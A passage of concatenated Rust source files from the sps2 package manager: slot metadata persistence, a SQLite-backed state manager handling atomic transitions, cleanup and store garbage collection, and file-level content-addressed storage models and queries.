.map_err(|e| Error::internal(format!("failed to serialise slot metadata: {e}")))?;
let tmp_path = self.metadata_path.with_extension("json.tmp");
if let Some(parent) = self.metadata_path.parent() {
fs::create_dir_all(parent).await?;
}
if fs::exists(&tmp_path).await {
fs::remove_dir_all(&tmp_path).await.ok();
fs::remove_file(&tmp_path).await.ok();
}
tokio_fs::write(&tmp_path, payload)
.await
.map_err(|e| Error::internal(format!("failed to write slot metadata: {e}")))?;
tokio_fs::rename(&tmp_path, &self.metadata_path)
.await
.map_err(|e| Error::internal(format!("failed to commit slot metadata: {e}")))?;
Ok(())
}
async fn load_metadata(path: &Path) -> Result<SlotMetadata, Error> {
if !fs::exists(path).await {
return Ok(SlotMetadata::default());
}
let bytes = tokio_fs::read(path)
.await
.map_err(|e| Error::internal(format!("failed to read slot metadata: {e}")))?;
serde_json::from_slice(&bytes)
.map_err(|e| Error::internal(format!("failed to parse slot metadata: {e}")))
}
}
fn parse_state_marker(value: &str) -> Result<Option<Uuid>, Error> {
let trimmed = value.trim();
if trimmed.is_empty() {
return Ok(None);
}
Uuid::parse_str(trimmed)
.map(Some)
.map_err(|e| Error::internal(format!("invalid slot marker value: {e}")))
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/src/manager.rs | crates/state/src/manager.rs | //! State manager implementation
use crate::{
live_slots::LiveSlots,
models::{Package, PackageRef, State, StoreRef},
queries,
};
use sps2_errors::Error;
use sps2_events::{AppEvent, CleanupSummary, EventEmitter, EventSender, GeneralEvent, StateEvent};
use sps2_hash::Hash;
use sps2_platform::filesystem_helpers as sps2_root;
use sps2_types::{state::SlotId, StateId};
use sqlx::{Pool, Sqlite};
use std::convert::TryFrom;
use std::path::PathBuf;
use std::sync::Arc;
use std::time::Instant;
use tokio::sync::Mutex;
use uuid::Uuid;
/// State manager for atomic updates
#[derive(Clone)]
pub struct StateManager {
pool: Pool<Sqlite>,
state_path: PathBuf,
live_path: PathBuf,
pub live_slots: Arc<Mutex<LiveSlots>>,
tx: EventSender,
}
impl std::fmt::Debug for StateManager {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
f.debug_struct("StateManager")
.field("state_path", &self.state_path)
.field("live_path", &self.live_path)
.finish_non_exhaustive()
}
}
impl EventEmitter for StateManager {
fn event_sender(&self) -> Option<&EventSender> {
Some(&self.tx)
}
}
impl StateManager {
// Helper: add package refs and build map PackageId -> db id, returning increment count
async fn add_package_refs_and_build_id_map(
&self,
tx: &mut sqlx::Transaction<'_, sqlx::Sqlite>,
package_refs: &[PackageRef],
) -> Result<
(
std::collections::HashMap<sps2_resolver::PackageId, i64>,
usize,
),
Error,
> {
let mut package_id_map = std::collections::HashMap::new();
for package_ref in package_refs {
let package_id = queries::add_package(
tx,
&package_ref.state_id,
&package_ref.package_id.name,
&package_ref.package_id.version.to_string(),
&package_ref.hash,
package_ref.size,
)
.await?;
// Ensure the CAS row exists, but do not adjust refcounts here.
queries::get_or_create_store_ref(tx, &package_ref.hash, package_ref.size).await?;
package_id_map.insert(package_ref.package_id.clone(), package_id);
}
Ok((package_id_map, package_refs.len()))
}
// Helper: process pending hashes for packages with computed file hashes
async fn process_pending_file_hashes(
&self,
tx: &mut sqlx::Transaction<'_, sqlx::Sqlite>,
package_id_map: &std::collections::HashMap<sps2_resolver::PackageId, i64>,
pending: &[(sps2_resolver::PackageId, Vec<sps2_hash::FileHashResult>)],
) -> Result<usize, Error> {
let mut file_inc_count = 0usize;
for (package_id, file_hashes) in pending {
if let Some(&db_package_id) = package_id_map.get(package_id) {
for file_hash in file_hashes {
let relative_path = file_hash.relative_path.clone();
let file_ref = crate::FileReference {
package_id: db_package_id,
relative_path,
hash: file_hash.hash.clone(),
metadata: crate::FileMetadata {
size: file_hash.size as i64,
permissions: file_hash.mode.unwrap_or(0o644),
uid: 0,
gid: 0,
mtime: None,
is_executable: file_hash.mode.map(|m| m & 0o111 != 0).unwrap_or(false),
is_symlink: file_hash.is_symlink,
symlink_target: None,
},
};
let _ =
queries::add_file_object(tx, &file_ref.hash, &file_ref.metadata).await?;
queries::add_package_file_entry(tx, db_package_id, &file_ref).await?;
file_inc_count += 1;
}
}
}
Ok(file_inc_count)
}
// Helper: process direct file references
async fn process_file_references(
&self,
tx: &mut sqlx::Transaction<'_, sqlx::Sqlite>,
file_references: &[(i64, crate::FileReference)],
) -> Result<usize, Error> {
let mut file_inc_count = 0usize;
for (package_id, file_ref) in file_references {
let _ = queries::add_file_object(tx, &file_ref.hash, &file_ref.metadata).await?;
queries::add_package_file_entry(tx, *package_id, file_ref).await?;
file_inc_count += 1;
}
Ok(file_inc_count)
}
/// Create a new state manager with database setup
///
/// # Errors
///
/// Returns an error if database setup, migrations, or directory creation fails.
pub async fn new(base_path: &std::path::Path) -> Result<Self, Error> {
let db_path = base_path.join("state.sqlite");
let state_path = base_path.join("states");
let live_path = base_path.join("live");
// Create database pool and run migrations
let pool = crate::create_pool(&db_path).await?;
crate::run_migrations(&pool).await?;
// Check if we need to create an initial state
Self::ensure_initial_state(&pool).await?;
// Create event channel (events will be ignored for now)
let (tx, _rx) = sps2_events::channel();
let live_slots = LiveSlots::initialize(state_path.clone(), live_path.clone()).await?;
let live_slots = Arc::new(Mutex::new(live_slots));
let mut manager = Self {
pool,
state_path,
live_path,
live_slots,
tx,
};
// Attempt to recover from a previous transaction if a journal exists
if let Err(e) = manager.recover_from_journal().await {
manager.emit(AppEvent::General(GeneralEvent::warning(format!(
"Recovery failed: {e}"
))));
}
Ok(manager)
}
/// Create a new state manager with existing pool and event sender
#[must_use]
pub fn with_pool(
pool: Pool<Sqlite>,
state_path: PathBuf,
live_path: PathBuf,
live_slots: Arc<Mutex<LiveSlots>>,
tx: EventSender,
) -> Self {
Self {
pool,
state_path,
live_path,
live_slots,
tx,
}
}
/// Get the current active state
///
/// # Errors
///
/// Returns an error if the database query fails or no active state exists.
pub async fn get_active_state(&self) -> Result<StateId, Error> {
let mut tx = self.pool.begin().await?;
let state_id = queries::get_active_state(&mut tx).await?;
tx.commit().await?;
Ok(state_id)
}
/// Get the live path for this state manager
#[must_use]
pub fn live_path(&self) -> &std::path::Path {
&self.live_path
}
/// Get the state path for this state manager
#[must_use]
pub fn state_path(&self) -> &std::path::Path {
&self.state_path
}
/// Returns the identifier of the currently active slot.
pub async fn active_slot(&self) -> SlotId {
self.live_slots.lock().await.active_slot()
}
/// Returns the identifier of the inactive slot.
pub async fn inactive_slot(&self) -> SlotId {
self.live_slots.lock().await.inactive_slot()
}
/// Resolve the filesystem path for a slot.
pub async fn slot_path(&self, slot: SlotId) -> PathBuf {
self.live_slots.lock().await.slot_path(slot)
}
/// Read the recorded state for a slot.
pub async fn slot_state(&self, slot: SlotId) -> Option<Uuid> {
self.live_slots.lock().await.slot_state(slot)
}
/// Ensure the given slot directory exists and return its path.
///
/// # Errors
///
/// Returns an error if creating the directory fails.
pub async fn ensure_slot_dir(&self, slot: SlotId) -> Result<PathBuf, Error> {
self.live_slots.lock().await.ensure_slot_dir(slot).await
}
/// Recovers a transaction from the journal file if one exists.
///
/// # Errors
///
/// Returns an error if journal reading or recovery operations fail.
pub async fn recover_from_journal(&mut self) -> Result<(), Error> {
if let Some(journal) = self.read_journal().await? {
self.emit(AppEvent::General(GeneralEvent::debug_with_context(
format!(
"Starting recovery from journal for state {}",
journal.new_state_id
),
std::collections::HashMap::new(),
)));
match journal.phase {
sps2_types::state::TransactionPhase::Prepared => {
self.emit(AppEvent::General(GeneralEvent::debug_with_context(
"Recovering from Prepared state".to_string(),
std::collections::HashMap::new(),
)));
self.execute_filesystem_swap_and_finalize(journal).await?;
}
sps2_types::state::TransactionPhase::Swapped => {
self.emit(AppEvent::General(GeneralEvent::debug_with_context(
"Recovering from Swapped state".to_string(),
std::collections::HashMap::new(),
)));
self.finalize_db_state(journal.new_state_id).await?;
self.clear_journal().await?;
}
}
self.emit(AppEvent::General(GeneralEvent::debug_with_context(
"Recovery completed".to_string(),
std::collections::HashMap::new(),
)));
}
Ok(())
}
/// Persist the association between a slot and a state identifier.
///
/// # Errors
///
/// Returns an error if persisting the slot state fails.
pub async fn set_slot_state(&self, slot: SlotId, state: Option<Uuid>) -> Result<(), Error> {
let mut slots = self.live_slots.lock().await;
slots.record_slot_state(slot, state).await
}
#[allow(dead_code)]
/// Refresh slot states from disk markers.
///
/// # Errors
///
/// Returns an error if refreshing slot states fails.
pub async fn refresh_live_slots(&self) -> Result<(), Error> {
let mut slots = self.live_slots.lock().await;
slots.refresh_slot_states().await
}
/// Get all installed packages in current state
///
/// # Errors
///
/// Returns an error if the database query fails.
pub async fn get_installed_packages(&self) -> Result<Vec<Package>, Error> {
let mut tx = self.pool.begin().await?;
let state_id = queries::get_active_state(&mut tx).await?;
let packages = queries::get_state_packages(&mut tx, &state_id).await?;
tx.commit().await?;
Ok(packages)
}
/// Get all installed packages in a specific state
///
/// # Errors
///
/// Returns an error if the database query fails.
pub async fn get_installed_packages_in_state(
&self,
state_id: &StateId,
) -> Result<Vec<Package>, Error> {
let mut tx = self.pool.begin().await?;
let packages = queries::get_state_packages(&mut tx, state_id).await?;
tx.commit().await?;
Ok(packages)
}
/// Begin a state transition
///
/// # Errors
///
/// Returns an error if database queries fail or filesystem operations fail.
pub async fn begin_transition(&self, operation: &str) -> Result<StateTransition, Error> {
// Get current state
let mut tx = self.pool.begin().await?;
let current_state = queries::get_active_state(&mut tx).await?;
tx.commit().await?;
// Create staging directory
let staging_id = Uuid::new_v4();
let staging_path = self.state_path.join(format!("staging-{staging_id}"));
// Clone current state to staging (or create empty staging for first install)
if sps2_root::exists(&self.live_path).await {
sps2_root::clone_directory(&self.live_path, &staging_path).await?;
} else {
sps2_root::create_dir_all(&staging_path).await?;
}
Ok(StateTransition {
from: current_state,
to: staging_id,
staging_path,
operation: operation.to_string(),
})
}
// Note: rollback is now implemented reconstructively in the installer crate.
/// Get state history
///
/// # Errors
///
/// Returns an error if the database query fails.
pub async fn get_history(&self) -> Result<Vec<State>, Error> {
let mut tx = self.pool.begin().await?;
let states = queries::get_all_states(&mut tx).await?;
tx.commit().await?;
Ok(states)
}
/// Clean up old states
///
/// # Errors
///
/// Returns an error if database operations or filesystem cleanup fails.
pub async fn cleanup(
&self,
retention_count: usize,
retention_days: u32,
) -> Result<CleanupResult, Error> {
let mut tx = self.pool.begin().await?;
// Determine states to prune (visibility) using policy
let prune_by_count =
queries::get_states_for_cleanup_strict(&mut tx, retention_count).await?;
let mut prune_ids: std::collections::HashSet<String> = prune_by_count.into_iter().collect();
if retention_days > 0 {
let cutoff = chrono::Utc::now().timestamp() - i64::from(retention_days) * 86_400;
let older = queries::get_states_older_than(&mut tx, cutoff).await?;
for id in older {
prune_ids.insert(id);
}
}
let active = queries::get_active_state(&mut tx).await?;
let active_str = active.to_string();
let now_ts = chrono::Utc::now().timestamp();
let prune_list: Vec<String> = prune_ids.into_iter().collect();
let states_pruned =
queries::mark_pruned_states(&mut tx, &prune_list, now_ts, &active_str).await?;
// Legacy directories to remove (IDs beyond newest N)
let states_to_remove =
queries::get_states_for_cleanup_strict(&mut tx, retention_count).await?;
let cleanup_start = Instant::now();
let mut cleanup_summary = CleanupSummary {
planned_states: states_to_remove.len(),
removed_states: None,
space_freed_bytes: None,
duration_ms: None,
};
self.tx.emit(AppEvent::State(StateEvent::CleanupStarted {
summary: cleanup_summary.clone(),
}));
let mut space_freed = 0u64;
let mut removed_count: usize = 0;
// Remove state directories
for state_id in &states_to_remove {
let state_path = self.state_path.join(state_id);
if sps2_root::exists(&state_path).await {
space_freed += sps2_root::size(&state_path).await?;
sps2_root::remove_dir_all(&state_path).await?;
removed_count += 1;
}
}
// Clean up orphaned staging directories (only if safe to remove)
let mut entries = tokio::fs::read_dir(&self.state_path).await?;
while let Some(entry) = entries.next_entry().await? {
let name = entry.file_name();
if let Some(name_str) = name.to_str() {
if name_str.starts_with("staging-") {
// Extract staging ID from directory name
if let Some(id_str) = name_str.strip_prefix("staging-") {
if let Ok(staging_id) = uuid::Uuid::parse_str(id_str) {
// Only remove if it's safe to do so
if self.can_remove_staging(&staging_id).await? {
let path = entry.path();
space_freed += sps2_root::size(&path).await?;
sps2_root::remove_dir_all(&path).await?;
removed_count += 1;
}
}
}
}
}
}
// Log cleanup operation to gc_log table
let total_items_removed = i64::try_from(removed_count)
.map_err(|e| Error::internal(format!("items removed count overflow: {e}")))?;
let space_freed_i64 = i64::try_from(space_freed)
.map_err(|e| Error::internal(format!("space freed overflow: {e}")))?;
queries::insert_gc_log(&mut tx, total_items_removed, space_freed_i64).await?;
tx.commit().await?;
cleanup_summary.removed_states = Some(removed_count);
cleanup_summary.space_freed_bytes = Some(space_freed);
cleanup_summary.duration_ms =
Some(u64::try_from(cleanup_start.elapsed().as_millis()).unwrap_or(u64::MAX));
self.tx.emit(AppEvent::State(StateEvent::CleanupCompleted {
summary: cleanup_summary,
}));
Ok(CleanupResult {
states_pruned,
states_removed: removed_count,
space_freed,
})
}
/// Get package dependents
///
/// # Errors
///
/// Returns an error if the database query fails.
pub async fn get_package_dependents(
&self,
package_id: &sps2_resolver::PackageId,
) -> Result<Vec<String>, Error> {
let mut tx = self.pool.begin().await?;
let dependents = queries::get_package_dependents(&mut tx, &package_id.name).await?;
tx.commit().await?;
Ok(dependents)
}
/// Garbage collect unreferenced store items
///
/// # Errors
///
/// Returns an error if database operations fail.
pub async fn gc_store(&self) -> Result<Vec<Hash>, Error> {
let mut tx = self.pool.begin().await?;
let unreferenced = queries::get_unreferenced_store_items(&mut tx).await?;
let hashes: Vec<Hash> = unreferenced.iter().map(StoreRef::hash).collect();
let hash_strings: Vec<String> = unreferenced.iter().map(|item| item.hash.clone()).collect();
queries::delete_unreferenced_store_items(&mut tx, &hash_strings).await?;
tx.commit().await?;
Ok(hashes)
}
/// Garbage collect unreferenced store items with file removal
///
/// # Errors
///
/// Returns an error if database operations or file removal fails.
pub async fn gc_store_with_removal(
&self,
store: &sps2_store::PackageStore,
) -> Result<usize, Error> {
let mut tx = self.pool.begin().await?;
// Get unreferenced items
let unreferenced = queries::get_unreferenced_store_items(&mut tx).await?;
let hashes: Vec<Hash> = unreferenced.iter().map(StoreRef::hash).collect();
let hash_strings: Vec<String> = unreferenced.iter().map(|item| item.hash.clone()).collect();
let packages_removed = unreferenced.len();
let cleanup_start = Instant::now();
let mut cleanup_summary = CleanupSummary {
planned_states: packages_removed,
removed_states: None,
space_freed_bytes: None,
duration_ms: None,
};
self.tx.emit(AppEvent::State(StateEvent::CleanupStarted {
summary: cleanup_summary.clone(),
}));
// Delete from database first
queries::delete_unreferenced_store_items(&mut tx, &hash_strings).await?;
// Log GC operation to gc_log table (only counting packages removed, space calculation is approximate)
let packages_removed_i64 = i64::try_from(packages_removed)
.map_err(|e| Error::internal(format!("packages removed count overflow: {e}")))?;
let total_size: i64 = unreferenced.iter().map(|item| item.size).sum();
queries::insert_gc_log(&mut tx, packages_removed_i64, total_size).await?;
tx.commit().await?;
// Remove files from store
for hash in &hashes {
if let Err(e) = store.remove_package(hash).await {
// Log warning but continue with other packages
self.tx
.emit(AppEvent::General(GeneralEvent::warning(format!(
"Failed to remove package {}: {e}",
hash.to_hex()
))));
}
}
let space_freed_bytes: u64 = unreferenced
.iter()
.map(|item| u64::try_from(item.size).unwrap_or(0))
.sum();
cleanup_summary.removed_states = Some(packages_removed);
cleanup_summary.space_freed_bytes = Some(space_freed_bytes);
cleanup_summary.duration_ms =
Some(u64::try_from(cleanup_start.elapsed().as_millis()).unwrap_or(u64::MAX));
self.tx.emit(AppEvent::State(StateEvent::CleanupCompleted {
summary: cleanup_summary,
}));
Ok(packages_removed)
}
/// Add package reference
///
/// # Errors
///
/// Returns an error if database operations fail.
pub async fn add_package_ref(&self, package_ref: &PackageRef) -> Result<(), Error> {
let mut tx = self.pool.begin().await?;
// Add package to the state
queries::add_package(
&mut tx,
&package_ref.state_id,
&package_ref.package_id.name,
&package_ref.package_id.version.to_string(),
&package_ref.hash,
package_ref.size,
)
.await?;
// Ensure store reference exists and increment it
queries::get_or_create_store_ref(&mut tx, &package_ref.hash, package_ref.size).await?;
queries::increment_store_ref(&mut tx, &package_ref.hash).await?;
tx.commit().await?;
Ok(())
}
/// Add package reference with venv path
///
/// # Errors
///
/// Returns an error if database operations fail.
pub async fn add_package_ref_with_venv(
&self,
package_ref: &PackageRef,
venv_path: Option<&str>,
) -> Result<(), Error> {
let mut tx = self.pool.begin().await?;
// Add package to the state with venv path
queries::add_package_with_venv(
&mut tx,
&package_ref.state_id,
&package_ref.package_id.name,
&package_ref.package_id.version.to_string(),
&package_ref.hash,
package_ref.size,
venv_path,
)
.await?;
// Ensure store reference exists and increment it
queries::get_or_create_store_ref(&mut tx, &package_ref.hash, package_ref.size).await?;
queries::increment_store_ref(&mut tx, &package_ref.hash).await?;
tx.commit().await?;
Ok(())
}
/// Add package reference with an existing transaction
///
/// # Errors
///
/// Returns an error if database operations fail.
pub async fn add_package_ref_with_tx(
&self,
tx: &mut sqlx::Transaction<'_, sqlx::Sqlite>,
package_ref: &PackageRef,
) -> Result<i64, Error> {
// Add package to the state and get its ID
let package_id = queries::add_package(
tx,
&package_ref.state_id,
&package_ref.package_id.name,
&package_ref.package_id.version.to_string(),
&package_ref.hash,
package_ref.size,
)
.await?;
// Ensure store reference exists and increment it
queries::get_or_create_store_ref(tx, &package_ref.hash, package_ref.size).await?;
queries::increment_store_ref(tx, &package_ref.hash).await?;
Ok(package_id)
}
/// Add package reference with venv path using an existing transaction
///
/// # Errors
///
/// Returns an error if database operations fail.
pub async fn add_package_ref_with_venv_tx(
&self,
tx: &mut sqlx::Transaction<'_, sqlx::Sqlite>,
package_ref: &PackageRef,
venv_path: Option<&str>,
) -> Result<i64, Error> {
// Add package to the state with venv path and get its ID
let package_id = queries::add_package_with_venv(
tx,
&package_ref.state_id,
&package_ref.package_id.name,
&package_ref.package_id.version.to_string(),
&package_ref.hash,
package_ref.size,
venv_path,
)
.await?;
// Ensure store reference exists and increment it
queries::get_or_create_store_ref(tx, &package_ref.hash, package_ref.size).await?;
queries::increment_store_ref(tx, &package_ref.hash).await?;
Ok(package_id)
}
/// Get state path for a state ID
///
/// # Errors
///
/// Currently does not fail, but returns `Result` for API consistency.
pub fn get_state_path(
&self,
state_id: sps2_types::StateId,
) -> Result<std::path::PathBuf, Error> {
Ok(self.state_path.join(state_id.to_string()))
}
/// Set active state
///
/// # Errors
///
/// Returns an error if the database update fails.
pub async fn set_active_state(&self, state_id: sps2_types::StateId) -> Result<(), Error> {
let mut tx = self.pool.begin().await?;
queries::set_active_state(&mut tx, &state_id).await?;
tx.commit().await?;
Ok(())
}
/// Set active state with transaction
///
/// # Errors
///
/// Returns an error if the database update fails.
pub async fn set_active_state_with_tx(
&self,
tx: &mut sqlx::Transaction<'_, sqlx::Sqlite>,
state_id: sps2_types::StateId,
) -> Result<(), Error> {
queries::set_active_state(tx, &state_id).await?;
Ok(())
}
/// Check if state exists
///
/// # Errors
///
/// Returns an error if the database query fails.
pub async fn state_exists(&self, state_id: &sps2_types::StateId) -> Result<bool, Error> {
let mut tx = self.pool.begin().await?;
let exists = queries::state_exists(&mut tx, state_id).await?;
tx.commit().await?;
Ok(exists)
}
/// List all states
///
/// # Errors
///
/// Returns an error if the database query fails.
pub async fn list_states(&self) -> Result<Vec<sps2_types::StateId>, Error> {
let mut tx = self.pool.begin().await?;
let states = queries::list_states(&mut tx).await?;
tx.commit().await?;
Ok(states)
}
/// List all states with full details
///
/// # Errors
///
/// Returns an error if the database query fails.
pub async fn list_states_detailed(&self) -> Result<Vec<State>, Error> {
let mut tx = self.pool.begin().await?;
let states = queries::list_states_detailed(&mut tx).await?;
tx.commit().await?;
Ok(states)
}
/// Get packages in a state
///
/// # Errors
///
/// Returns an error if the database query fails.
pub async fn get_state_packages(
&self,
state_id: &sps2_types::StateId,
) -> Result<Vec<String>, Error> {
let mut tx = self.pool.begin().await?;
let packages = queries::get_state_package_names(&mut tx, state_id).await?;
tx.commit().await?;
Ok(packages)
}
/// Clean up old states
///
/// # Errors
///
/// Returns an error if database operations fail.
pub async fn cleanup_old_states(
&self,
keep_count: usize,
) -> Result<Vec<sps2_types::StateId>, Error> {
let mut tx = self.pool.begin().await?;
// Get states strictly by creation time, keeping only the N newest
// This replaces the old age+retention logic with pure retention by creation time
let states = queries::get_states_for_cleanup_strict(&mut tx, keep_count).await?;
tx.commit().await?;
// Convert strings to StateIds
let state_ids = states
.into_iter()
.filter_map(|s| uuid::Uuid::parse_str(&s).ok())
.collect();
Ok(state_ids)
}
/// Get current state ID
///
/// # Errors
///
/// Returns an error if the database query fails.
pub async fn get_current_state_id(&self) -> Result<sps2_types::StateId, Error> {
self.get_active_state().await
}
/// Begin transaction (placeholder implementation)
///
/// # Errors
///
/// Returns an error if the database transaction cannot be started.
pub async fn begin_transaction(&self) -> Result<sqlx::Transaction<'_, sqlx::Sqlite>, Error> {
Ok(self.pool.begin().await?)
}
/// Get venv path for a package
///
/// # Errors
///
/// Returns an error if the database query fails.
pub async fn get_package_venv_path(
&self,
package_name: &str,
package_version: &str,
) -> Result<Option<String>, Error> {
let mut tx = self.pool.begin().await?;
let state_id = queries::get_active_state(&mut tx).await?;
let venv_path =
queries::get_package_venv_path(&mut tx, &state_id, package_name, package_version)
.await?;
tx.commit().await?;
Ok(venv_path)
}
/// Get all packages with venvs in the current state
///
/// # Errors
///
/// Returns an error if the database query fails.
pub async fn get_packages_with_venvs(&self) -> Result<Vec<(String, String, String)>, Error> {
let mut tx = self.pool.begin().await?;
let state_id = queries::get_active_state(&mut tx).await?;
let packages = queries::get_packages_with_venvs(&mut tx, &state_id).await?;
tx.commit().await?;
Ok(packages)
}
/// Update venv path for a package
///
/// # Errors
///
/// Returns an error if the database update fails.
pub async fn update_package_venv_path(
&self,
package_name: &str,
package_version: &str,
venv_path: Option<&str>,
) -> Result<(), Error> {
let mut tx = self.pool.begin().await?;
let state_id = queries::get_active_state(&mut tx).await?;
queries::update_package_venv_path(
&mut tx,
&state_id,
package_name,
package_version,
venv_path,
)
.await?;
tx.commit().await?;
Ok(())
}
/// Create state with transaction
///
/// # Errors
///
/// Returns an error if the database insert fails.
pub async fn create_state_with_tx(
&self,
tx: &mut sqlx::Transaction<'_, sqlx::Sqlite>,
state_id: &sps2_types::StateId,
parent_id: Option<&sps2_types::StateId>,
operation: &str,
) -> Result<(), Error> {
queries::create_state(tx, state_id, parent_id, operation).await
}
/// Get parent state ID
///
/// # Errors
///
/// Returns an error if database operations fail.
pub async fn get_parent_state_id(
&self,
state_id: &sps2_types::StateId,
) -> Result<Option<sps2_types::StateId>, Error> {
let mut tx = self.pool.begin().await?;
let parent_id = queries::get_parent_state_id(&mut tx, state_id).await?;
tx.commit().await?;
Ok(parent_id)
}
/// Verify database consistency
///
/// # Errors
///
/// Returns an error if database verification fails.
pub async fn verify_consistency(&self) -> Result<(), Error> {
let mut tx = self.pool.begin().await?;
// Basic verification - check if we can query the database
let _active_state = queries::get_active_state(&mut tx).await?;
tx.commit().await?;
Ok(())
}
/// Unprune a state so it appears again in base history
///
/// # Errors
///
/// Returns an error if the database update fails.
pub async fn unprune_state(&self, state_id: &sps2_types::StateId) -> Result<(), Error> {
let mut tx = self.pool.begin().await?;
let id_str = state_id.to_string();
queries::unprune_state(&mut tx, &id_str).await?;
tx.commit().await?;
Ok(())
}
/// Ensure an initial state exists, creating one if necessary
///
/// # Errors
///
/// Returns an error if database operations fail.
async fn ensure_initial_state(pool: &Pool<Sqlite>) -> Result<(), Error> {
let mut tx = pool.begin().await?;
// Check if any states exist
let state_count: i64 = sqlx::query_scalar("SELECT COUNT(*) FROM states")
.fetch_one(&mut *tx)
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | true |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/src/file_models.rs | crates/state/src/file_models.rs | //! Database models for file-level content addressable storage
use chrono::{DateTime, Utc};
use serde::{Deserialize, Serialize};
use sps2_hash::Hash;
use sqlx::FromRow;
/// A file object in content-addressed storage
#[derive(Debug, Clone, FromRow, Serialize, Deserialize)]
pub struct FileObject {
pub hash: String,
pub size: i64,
pub created_at: i64,
pub ref_count: i64,
pub is_executable: bool,
pub is_symlink: bool,
pub symlink_target: Option<String>,
}
impl FileObject {
/// Parse the hash
///
/// # Panics
///
/// Panics if the stored hash string is not valid.
#[must_use]
pub fn hash(&self) -> Hash {
Hash::from_hex(&self.hash).expect("valid hash in database")
}
/// Get creation timestamp
///
/// # Panics
///
/// Panics if the stored timestamp is not valid.
#[must_use]
pub fn created_at(&self) -> DateTime<Utc> {
DateTime::from_timestamp(self.created_at, 0).expect("valid timestamp in database")
}
/// Check if the file is referenced by any packages
#[must_use]
pub fn is_referenced(&self) -> bool {
self.ref_count > 0
}
}
/// A file entry within a package
#[derive(Debug, Clone, FromRow, Serialize, Deserialize)]
pub struct PackageFileEntry {
pub id: i64,
pub package_id: i64,
pub file_hash: String,
pub relative_path: String,
pub permissions: i64,
pub uid: i64,
pub gid: i64,
pub mtime: Option<i64>,
}
impl PackageFileEntry {
/// Parse the file hash
///
/// # Panics
///
/// Panics if the stored hash string is not valid.
#[must_use]
pub fn file_hash(&self) -> Hash {
Hash::from_hex(&self.file_hash).expect("valid hash in database")
}
/// Get modification timestamp if available
#[must_use]
pub fn mtime(&self) -> Option<DateTime<Utc>> {
self.mtime.and_then(|ts| DateTime::from_timestamp(ts, 0))
}
/// Get Unix permissions as octal
#[must_use]
pub fn permissions_octal(&self) -> u32 {
self.permissions as u32
}
}
/// An installed file tracking its location
#[derive(Debug, Clone, FromRow, Serialize, Deserialize)]
pub struct InstalledFile {
pub id: i64,
pub state_id: String,
pub package_id: i64,
pub file_hash: String,
pub installed_path: String,
pub is_directory: bool,
}
impl InstalledFile {
/// Parse the file hash
///
/// # Panics
///
/// Panics if the stored hash string is not valid.
#[must_use]
pub fn file_hash(&self) -> Hash {
Hash::from_hex(&self.file_hash).expect("valid hash in database")
}
/// Parse the state ID as UUID
///
/// # Panics
///
/// Panics if the stored state ID is not a valid UUID.
#[must_use]
pub fn state_uuid(&self) -> uuid::Uuid {
uuid::Uuid::parse_str(&self.state_id).expect("valid UUID in database")
}
}
/// Simple modification time tracker for file verification optimization
#[derive(Debug, Clone)]
pub struct FileMTimeTracker {
pub file_path: String,
pub last_verified_mtime: i64,
}
/// Summary statistics for file-level storage
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct FileStorageStats {
pub total_files: i64,
pub unique_files: i64,
pub total_size: i64,
pub deduplicated_size: i64,
pub deduplication_ratio: f64,
}
/// File metadata for storage operations
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct FileMetadata {
pub size: i64,
pub permissions: u32,
pub uid: u32,
pub gid: u32,
pub mtime: Option<i64>,
pub is_executable: bool,
pub is_symlink: bool,
pub symlink_target: Option<String>,
}
impl FileMetadata {
/// Create metadata for a regular file
#[must_use]
pub fn regular_file(size: i64, permissions: u32) -> Self {
Self {
size,
permissions,
uid: 0,
gid: 0,
mtime: None,
is_executable: permissions & 0o111 != 0,
is_symlink: false,
symlink_target: None,
}
}
/// Create metadata for a symlink
#[must_use]
pub fn symlink(target: String) -> Self {
Self {
size: target.len() as i64,
permissions: 0o777,
uid: 0,
gid: 0,
mtime: None,
is_executable: false,
is_symlink: true,
symlink_target: Some(target),
}
}
}
/// Result of a file deduplication check
#[derive(Debug, Clone)]
pub struct DeduplicationResult {
pub hash: Hash,
pub was_duplicate: bool,
pub ref_count: i64,
pub space_saved: i64,
}
/// File reference for batch operations
#[derive(Debug, Clone)]
pub struct FileReference {
pub package_id: i64,
pub relative_path: String,
pub hash: Hash,
pub metadata: FileMetadata,
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/src/file_queries_runtime.rs | crates/state/src/file_queries_runtime.rs | //! File-level queries for CAS (schema v2)
use crate::file_models::{
DeduplicationResult, FileMTimeTracker, FileMetadata, FileObject, FileReference,
PackageFileEntry,
};
use sps2_errors::{Error, StateError};
use sps2_hash::Hash;
use sqlx::{query, Row, Sqlite, Transaction};
use std::collections::HashMap;
/// Insert or increment a file object entry.
///
/// # Errors
///
/// Returns an error if the database operations fail.
pub async fn add_file_object(
tx: &mut Transaction<'_, Sqlite>,
hash: &Hash,
metadata: &FileMetadata,
) -> Result<DeduplicationResult, Error> {
let hash_str = hash.to_hex();
let now = chrono::Utc::now().timestamp();
let existing = query("SELECT ref_count FROM cas_objects WHERE hash = ?1 AND kind = 'file'")
.bind(&hash_str)
.fetch_optional(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to check file object: {e}"),
})?;
if let Some(row) = existing {
let current: i64 = row.get("ref_count");
query("UPDATE cas_objects SET last_seen_at = ?2 WHERE hash = ?1 AND kind = 'file'")
.bind(&hash_str)
.bind(now)
.execute(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to update file metadata: {e}"),
})?;
ensure_file_verification_row(tx, &hash_str).await?;
return Ok(DeduplicationResult {
hash: hash.clone(),
was_duplicate: true,
ref_count: current,
space_saved: metadata.size,
});
}
query(
r#"
INSERT INTO cas_objects (
